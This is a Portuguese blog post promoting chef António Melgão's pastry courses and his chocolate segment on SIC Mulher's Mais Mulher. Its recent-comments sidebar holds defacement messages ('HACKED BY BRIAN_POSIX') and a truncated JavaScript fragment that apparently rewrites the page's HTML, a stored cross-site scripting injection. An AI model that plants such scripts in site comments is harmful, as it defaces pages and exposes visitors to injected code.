Pensada como uma ferramenta de evolução na pastelaria, tem conseguido ao longo destes anos passar ensinamentos das varias áreas da pastelaria, desde o chocolate, bombons, entremeios e semifrios, açúcar, gelados, etc…
Tendo mesmo realizado já  alguns cursos noutras áreas, como a utilização das Texturas El Bulli na cozinha.

Tendo como responsável técnico e formador o chefe António Melgão não deixamos no entanto de dar formação com outros chefes, alguns portugueses e outros estrangeiros, nomeadamente espanhóis e franceses.

 

E no Mais Mulher desta quarta-feira, António Melgão traz-lhe alguns exemplos do que melhor se faz com chocolate!

Um programa a não perder, esta quarta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO